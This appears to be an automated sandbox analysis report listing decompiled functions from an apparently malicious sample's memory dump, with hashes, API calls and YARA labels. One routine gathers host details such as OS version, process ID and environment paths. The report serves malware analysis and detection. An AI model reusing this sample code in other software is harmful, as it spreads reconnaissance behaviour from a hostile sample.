API String ID: 680773602-0
Opcode ID: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
Opcode Fuzzy Hash: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759

Uniqueness

Uniqueness Score: -1.00%

Function 0008E2C6, Relevance: 1.3, APIs: 1, Instructions: 92
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0008E2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0x12afa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0x12afa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x9e68c; // 0x12afab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E00088604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0x12afab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}

0x0008e2c6
0x0008e2d9
0x0008e2e0
0x0008e2e9
0x0008e2f1
0x0008e2f7
0x0008e2fc
0x0008e307
0x0008e30c
0x0008e3a5
0x0008e3a5
0x0008e3ad
0x00000000
0x0008e3b2
0x0008e313
0x0008e316
0x0008e31d
0x0008e32d
0x0008e333
0x0008e343
0x0008e348
0x0008e34d
0x0008e354
0x0008e358
0x0008e35f
0x0008e363
0x0008e367
0x0008e368
0x0008e36b
0x0008e370
0x0008e379
0x0008e385
0x0008e38f
0x0008e394
0x0008e394
0x0008e379
0x0008e39a
0x0008e39b
0x00000000
0x0008e3a4
0x00000000

APIs

Sleep.KERNELBASE(0000000A), ref: 0008E394

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008A3ED, Relevance: 1.3, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}

0x0008a3ed
0x0008a3f6
0x0008a3f8
0x0008a3fa
0x0008a3fe
0x0008a400
0x0008a408
0x0008a40f
0x0008a418
0x0008a41d
0x0008a422
0x0008a446
0x0008a44b
0x0008a451
0x0008a45d
0x0008a462
0x0008a424
0x0008a42d
0x0008a443
0x00000000
0x0008a42f
0x0008a43b
0x0008a440
0x0008a42d
0x0008a422
0x0008a465
0x0008a466
0x0008a400
0x0008a470

APIs

Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782

GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xf0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0x12af8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xf0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xf0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0x12af8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x00085d80
0x00085d95
0x00085d9e
0x00085da7
0x00085da9
0x00085db1
0x00085dc1
0x00085dcf
0x00085dd4
0x00085dd9
0x00085ddb
0x00085ddd
0x00085de2
0x00085de4
0x00085dff
0x00085dff
0x00085de6
0x00085de7
0x00085df2
0x00085dfa
0x00085dfc
0x00085dfc
0x00085de4
0x00085e01
0x00085db3
0x00085db4
0x00085db9
0x00085dbe
0x00085dbe
0x00085e05

APIs

lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 00085DF2

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0x12afab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0x12af8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}

0x0008ba0a
0x0008ba12
0x0008ba1a
0x0008ba1f
0x0008ba29
0x0008ba32
0x0008ba37
0x0008ba3c
0x0008ba5a
0x0008ba5d
0x0008ba3e
0x0008ba41
0x0008ba43
0x0008ba4b
0x0008ba4b
0x0008ba4e
0x0008ba4e
0x0008ba61
0x0008ba22
0x0008ba22
0x0008ba22

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51

Uniqueness

Uniqueness Score: -1.00%

Function 00085CEC, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xf0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t24);
				_t14 =  *0x9e688; // 0xf0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xf0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, __fp0);
				_t21 =  *0x9e684; // 0x12af8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}

0x00085cec
0x00085cec
0x00085cef
0x00085cfe
0x00085d03
0x00085d08
0x00085d0f
0x00085d15
0x00085d1b
0x00085d21
0x00085d26
0x00085d2b
0x00085d33
0x00085d3d
0x00085d4b
0x00085d53
0x00085d5f
0x00085d67
0x00085d6c
0x00085d72
0x00085d7c

APIs

Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,00083545), ref: 0008CF90
Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,00083545), ref: 0008CFB1
Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,00083545), ref: 0008CFED
Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3

Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A

memset.MSVCRT ref: 00085D5F

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
String ID:
API String ID: 4245722550-0
Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}

0x0008861d
0x00088622
0x00088668
0x00088668
0x00088625
0x00088629
0x0008862b
0x0008862e
0x00088634
0x00088642
0x00088646
0x00088646
0x00088636
0x00088637
0x0008863c
0x0008864f
0x00088660
0x00088660
0x00000000

APIs

HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9

Uniqueness

Uniqueness Score: -1.00%

Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x0008a786
0x0008a787
0x0008a78c
0x0008a790
0x0008a79f
0x0008a7a7
0x0008a7b4
0x00000000
0x0008a7b7
0x0008a7ab
0x00000000
0x0008a7ab
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2

Uniqueness

Uniqueness Score: -1.00%

Function 000898A6, Relevance: 1.3, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000898A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E0008984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}

0x000898aa
0x000898bc
0x000898ca
0x000898d7
0x000898da
0x000898e1
0x000898e1
0x00000000
0x000898e6
0x00000000

APIs

CloseHandle.KERNELBASE(?), ref: 000898CA

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790

Uniqueness

Uniqueness Score: -1.00%

Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0x12af8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0x12af8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}

0x0008b337
0x0008b33f
0x0008b344
0x0008b34a
0x0008b34e
0x0008b350
0x0008b355
0x0008b35e
0x0008b362
0x0008b362
0x0008b36a
0x00000000
0x0008b36d
0x0008b371

APIs

CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0x12af8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0x12afab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0x12afa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0x12af8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0x12af8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0x12af8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0x12af8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0x12af8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0x12af8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0x12af8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0x12af8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0x12af8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0x12af8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}

0x0008d01f
0x0008d029
0x0008d035
0x0008d03a
0x0008d03f
0x0008d3ff
0x0008d3ff
0x0008d04c
0x0008d052
0x0008d057
0x0008d05d
0x0008d06d
0x0008d079
0x0008d079
0x0008d082
0x0008d088
0x0008d08a
0x0008d093
0x0008d093
0x0008d09f
0x0008d0a3
0x0008d0a8
0x0008d0ae
0x0008d0b7
0x0008d0c5
0x0008d0cc
0x0008d0d1
0x0008d0d1
0x0008d0d2
0x0008d0b9
0x0008d0b9
0x0008d0b9
0x0008d0d8
0x0008d0e3
0x0008d0f1
0x0008d0f7
0x0008d0fb
0x0008d101
0x0008d108
0x0008d10f
0x0008d113
0x0008d11a
0x0008d11b
0x0008d128
0x0008d12a
0x0008d12f
0x0008d13c
0x0008d13e
0x0008d13e
0x0008d140
0x0008d14a
0x0008d156
0x0008d166
0x0008d16c
0x0008d172
0x0008d174
0x0008d185
0x0008d18b
0x0008d191
0x0008d196
0x0008d19c
0x0008d1a2
0x0008d1a7
0x0008d1ac
0x0008d1ac
0x0008d1b2
0x0008d1b2
0x0008d1bb
0x0008d1c7
0x0008d1cf
0x0008d1d3
0x0008d1d3
0x0008d1cf
0x0008d1d7
0x0008d1dd
0x0008d1e3
0x0008d1ea
0x0008d1fb
0x0008d201
0x0008d209
0x0008d210
0x0008d223
0x0008d229
0x0008d22e
0x0008d231
0x0008d234
0x0008d23a
0x0008d240
0x0008d242
0x0008d248
0x0008d251
0x0008d254
0x0008d254
0x0008d257
0x0008d25f
0x0008d26a
0x0008d270
0x0008d261
0x0008d263
0x0008d263
0x0008d279
0x0008d279
0x0008d27f
0x0008d287
0x0008d292
0x0008d297
0x0008d29d
0x0008d29f
0x0008d2ac
0x0008d2ad
0x0008d2ae
0x0008d2b9
0x0008d2bb
0x0008d2c2
0x0008d2c2
